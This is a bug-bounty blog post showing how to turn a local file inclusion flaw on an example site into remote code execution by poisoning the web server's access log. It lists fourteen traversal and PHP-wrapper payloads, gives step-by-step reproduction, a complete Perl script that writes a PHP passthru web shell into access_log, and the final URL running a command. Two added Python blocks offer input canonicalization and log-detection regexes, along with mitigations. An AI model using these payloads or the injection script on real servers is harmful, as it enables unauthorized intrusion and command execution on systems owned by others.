LFI to RCE by injecting access_log

Hardik Solanki
5 min read · Apr 24, 2020


Hello Everyone,

Today I want to share a trick for escalating a “Local File Inclusion/File Path Traversal” to “Remote Code Execution” by injecting into the access_log, which has a Critical impact.

What is LFI? Local File Inclusion is a vulnerability in some web applications: the website reads files from the server based on user input, and the developer doesn’t filter that input because he trusts the users :D.
What is RCE? Remote Code Execution is a bug that gives the attacker permission to execute commands on the server.

For example, when you test a website and find a Local File Inclusion (LFI), that is good, but this issue only gives you access to files on the server, just files, and you will get a decent bounty for it. If it becomes Remote Code Execution (RCE), it will be an awesome bounty. Now, every server has log files, and these files save every request to the website with its path and User-Agent, and sometimes the Referer value. We will use this file, access.log; you just need to brute-force the path of this file or of any other log file.

The following describes the various methods and types, based on my current knowledge, that might be useful when expanding an “LFI”.

[1] Basic LFI Payload :

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd

[2] NullByte Injection:

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%00

[3] NullByte Injection with URL Encoding:

http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%2500

[4] Simple URL Encoding:

http://xyz.com/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

[5] Double URL Encoding:

http://xyz.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

[6] Base64 Encoded:

http://xyz.com/index.php?page=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

[7] Filter Evasion-1:

http://xyz.com/index.php?page=../\../\../\../\../\../\../\etc/passwd

[8] Filter Evasion-2:

http://xyz.com/index.php?page=..\/..\/..\/..\/..\/..\/..\/etc/passwd

[9] Filter Evasion-3:

http://xyz.com/index.php?page=....//....//....//....//....//etc/passwd

LFI [PHP wrappers] Payloads:

[10] Simple PHP Filter:

http://xyz.com/index.php?page=php://filter/resource=/etc/passwd

[11] PHP ROT-13 Encoded Filter:

http://xyz.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd

[12] PHP Base-64 Encoded Filter:

http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

[13] PHP Base-64 Encoded Filter (Case Insensitive):

http://xyz.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=/etc/passwd

[14] PHP Filters (In Terms of Directory Traversal):

http://xyz.com/index.php?page=php://filter/resource=../../../etc/passwd
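Every payload above is the same path wearing a different encoding. The check a defender wants is the reverse operation: peel the layers off, record which tricks were used, and then refuse anything that is not a known page name. The Python below is an added example written for this post, not code from the author or from the vulnerable application (which is PHP). The base directory `/var/www/pages`, the allowlist `("aboutus", "contact")` and the appended `.php` extension are assumptions; the last one is exactly why the `%00` variants matter on old PHP, where the null byte truncated the path before the extension was reached.

```python
import posixpath
from urllib.parse import unquote

# Constructed sample values, modelled on the payload variants listed above (not captured traffic).
SAMPLE_PAGE_VALUES = [
    "aboutus",
    "../../../../../../../../../etc/passwd",
    "../../../../../../../../../etc/passwd%00",
    "../../../../../../../../../etc/passwd%2500",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "..\\/..\\/..\\/etc/passwd",
    "....//....//....//etc/passwd",
    "php://filter/convert.base64-encode/resource=/etc/passwd",
]


def canonicalize(value, max_rounds=3):
    """Undo the encoding layers stacked on a page parameter: repeated percent-decoding,
    null-byte truncation, backslash separators and the '....//' trick.
    Returns (clean_value, findings); findings names each technique observed."""
    findings = []
    decoded = value
    for _ in range(max_rounds):                # %252e -> %2e -> '.' needs more than one pass
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        findings.append("percent-encoding")
        decoded = nxt
    if "\x00" in decoded:                      # a C-backed open() stops at the first NUL
        findings.append("null-byte")
        decoded = decoded.split("\x00", 1)[0]
    if "\\" in decoded:                        # '..\/' reads as '../' to a lenient server
        findings.append("backslash-separator")
        decoded = decoded.replace("\\", "/")
    while "....//" in decoded:                 # a single, non-recursive strip of '../' leaves '../'
        findings.append("dot-stuffing")
        decoded = decoded.replace("....//", "../")
    if "://" in decoded:                       # php://, data://, ... are not file names at all
        findings.append("stream-wrapper")
    return decoded, sorted(set(findings))


def resolve_page(value, base_dir="/var/www/pages", allowed=("aboutus", "contact")):
    """Allowlist-based include resolution (assumed layout): only known page names are
    accepted, and the resolved path must still live under base_dir."""
    clean, findings = canonicalize(value)
    if "stream-wrapper" in findings or clean not in allowed:
        return None, findings
    path = posixpath.normpath(posixpath.join(base_dir, clean + ".php"))
    if not path.startswith(base_dir + "/"):    # defence in depth, never reached with a real allowlist
        return None, findings + ["escaped-base-dir"]
    return path, findings


def audit(values):
    """Map each candidate value to the evasion techniques seen in it (empty for a benign value)."""
    return {v: resolve_page(v)[1] for v in values}


if __name__ == "__main__":
    for value, techniques in audit(SAMPLE_PAGE_VALUES).items():
        print(f"{value!r:70} -> {techniques}")
```

The point of recording the findings rather than silently rejecting is that a request carrying `%2500` or `....//` is never an innocent typo; the same canonicalizer can feed a WAF rule or an alert, while the allowlist is what actually closes the hole.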

So, let’s start with an example:

I have a target, “http://xyz.com/index.php?page=aboutus”, and it’s vulnerable to LFI/FPT.

Steps to reproduce:

Step 1: Enter the following URL in the address bar of the browser:

http://xyz.com/index.php?page=aboutus

Step 2: Append the following basic LFI payload to the URL in the “page” parameter:

../../../../../../../../../../../../../../../etc/passwd

The basic LFI payload did not respond successfully

Note: the basic LFI payload didn’t work.

Step 3: As the basic LFI payload didn’t work, we will now try the “NullByte Injection Payload”, as shown below.

../../../../../../../../../../../../../../../etc/passwd%00

Yay! The NullByte Injection payload worked successfully, and hence we got the response in the browser.

This confirmed that the LFI was there. So now my target was to escalate it to RCE.

Now the idea was to get access to some file, maybe a log file, which contains user-controlled input (in order to run a command).

Step 4: Now what you have to do is search for log files. To find the log file location you need to find httpd.conf first.

So, by searching manually or using an automated scan, e.g. Intruder, we have to look for “httpd.conf”.

Here we found the httpd.conf path, e.g. “/etc/httpd/conf/httpd.conf%00”; now paste this into the URL in the “page” parameter. This is shown in the screenshot below.

httpd.conf file

View source (Ctrl+U) for a better view of their httpd.conf.

Here I found the Access_Log file

So I tried reading the access logs and error logs from the different locations listed there.

Step 5: Now, after some minutes of searching and reading log files, I found something like “access_log”, which is what I wanted. So I tried reading that access log, as shown below.

http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00

Here I was able to access the “access_log”

Step 6: Now we have to search for the word “v0pcr3w” (the marker of the web shell used for Remote Code Execution) in “access_log”. In my case, no word like “v0pcr3w” was found in “access_log”.

So, now we have to inject the “access_log”. Below is the Perl script used to inject the access_log, or you can download it here.

#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;

# Usage: perl Inject_Log.pl <host> <port>
my $host = $ARGV[0];
my $port = $ARGV[1];
die "Usage: $0 <host> <port>\n" unless defined $host && defined $port;

print "*** Injecting $host:$port access log...\n";

# The PHP snippet is sent as part of the request path; the web server writes the
# request line verbatim into access_log, which is what the later include executes.
my $rce = "<?if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";

# Raw TCP request rather than an HTTP client, so the path is not URL-encoded on the way out.
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp")
    || die "Can't connect to $host:$port!\n";
print $sock "GET /v0pcr3w " . $rce . " HTTP/1.1\r\n";   # "v0pcr3w" is the marker searched for in the log
print $sock "Host: " . $host . "\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "*** Done!\n\n";

Now the point is, how do we inject the script? Below are the steps to install Perl and inject the script into the access_log:

  1. Install Perl in your environment.
  2. Save the above Perl script as “Inject_Log.pl”.
  3. Now run it as “perl Inject_Log.pl <target> 80”, as shown in the following screenshot.

Perl script injected successfully into “access_log”

Step 7: If the Perl script was injected successfully, open the access_log again and search for “v0pcr3w”. If the word is there, we have successfully injected the access_log. This is shown in the screenshot below.

Wow! This shows that we have successfully injected the access_log

Step 8: Now use the line below to execute a command on the server:

“/home/pro_99/xyz.com/access_log%00&cmd=id”, and you’ll see the “id” command executed.

So, enter the following final URL in the address bar of the browser and hit Enter:

http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00&cmd=id

BOOM!

Our command executed successfully: “GET /v0pcr3w uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)”. This is shown in the screenshot below.
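The whole chain leaves two very recognisable lines in the very file it abuses: first a request line carrying a PHP open tag (the `v0pcr3w` request), then an include of the log path itself with a `cmd=` parameter. Both halves are easy to pick out of an Apache combined-format log, and correlating them by source address gives a high-confidence alert for the technique walked through above. The scanner below is an added example for this post, not code from the author; the log lines are constructed to mirror the steps above (the IPs, timestamps, sizes and the `echo 1` User-Agent value are made up), and the regexes are assumptions about what a generic detection would key on.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not the author's real log). Line 2 mirrors the
# request the Perl script sends, line 3 the final include URL from Step 8, and line 4 a PHP
# tag arriving through the User-Agent header, the other logged field the post mentions.
SAMPLE_ACCESS_LOG = r'''
203.0.113.7 - - [24/Apr/2020:10:01:02 +0000] "GET /index.php?page=aboutus HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Apr/2020:10:02:15 +0000] "GET /v0pcr3w <?if(get_magic_quotes_gpc()){ $_GET[cmd]=stripslashes($_GET[cmd]);} passthru($_GET[cmd]);?> HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [24/Apr/2020:10:03:40 +0000] "GET /index.php?page=../../../../../../home/pro_99/xyz.com/access_log%00&cmd=id HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Apr/2020:10:04:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 498 "-" "<?php echo 1; ?>"
'''.strip().splitlines()

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to a field after percent-decoding, so %2e%2e%2f and ../ look alike.
RULES = {
    "php-tag": re.compile(r"<\?(?!xml)"),                 # any PHP open tag in logged input
    "traversal": re.compile(r"\.\.[/\\]"),                # ../ or ..\ after decoding
    "null-byte": re.compile("\x00"),                      # %00 / %2500 decoded to a real NUL
    "stream-wrapper": re.compile(r"\b(php|data|expect|phar)://", re.I),
    "log-file": re.compile(r"(access|error)[_.]?log", re.I),  # the include target of Step 8
    "cmd-param": re.compile(r"[?&]cmd="),                 # parameter consumed by the planted code
}


def scan_access_log(lines):
    """Return one finding per suspicious field: (line_no, ip, field, [rule names])."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append((n, None, "unparsed", ["malformed-line"]))
            continue
        for field in ("req", "ref", "ua"):
            text = unquote(unquote(m.group(field)))   # two passes: catches double encoding
            hits = [name for name, rx in RULES.items() if rx.search(text)]
            if hits:
                findings.append((n, m.group("ip"), field, hits))
    return findings


def correlate(findings):
    """Source IPs that both planted a PHP tag and later requested a log file: the two halves
    of the log-poisoning chain, which together are far stronger evidence than either alone."""
    by_ip = {}
    for _, ip, _, hits in findings:
        if ip:
            by_ip.setdefault(ip, set()).update(hits)
    return sorted(ip for ip, hits in by_ip.items() if "php-tag" in hits and "log-file" in hits)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_ACCESS_LOG)
    for line_no, ip, field, hits in found:
        print(f"line {line_no} {ip} [{field}]: {', '.join(hits)}")
    print("log poisoning chain from:", correlate(found))
```

Two things the sample makes visible: the planted request gets a 404 and looks like noise on its own, and the second request is a 200 against `index.php`, which is why the correlation by source address matters. On the prevention side, the mitigations are the ones implied by the post itself: don't build include paths from user input, keep the web server's log directory unreadable by the PHP worker (here `apache` could read its own `access_log`), and run a PHP version where `%00` no longer truncates paths.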

Our command executed successfully

I hope this topic helps someone; thank you for reading.

Suggestions are most welcome, as always. I will keep posting security-related findings. If you got anything from this, you can press the clap icon below, and don’t forget to follow me on LinkedIn and Twitter as well. See you all next time. :)

Happy hacking!

Cheers!


Written by Hardik Solanki

Security in IT is like locking your house or car — it doesn’t stop the bad guys, but if it’s good enough they may move on to an easier target.
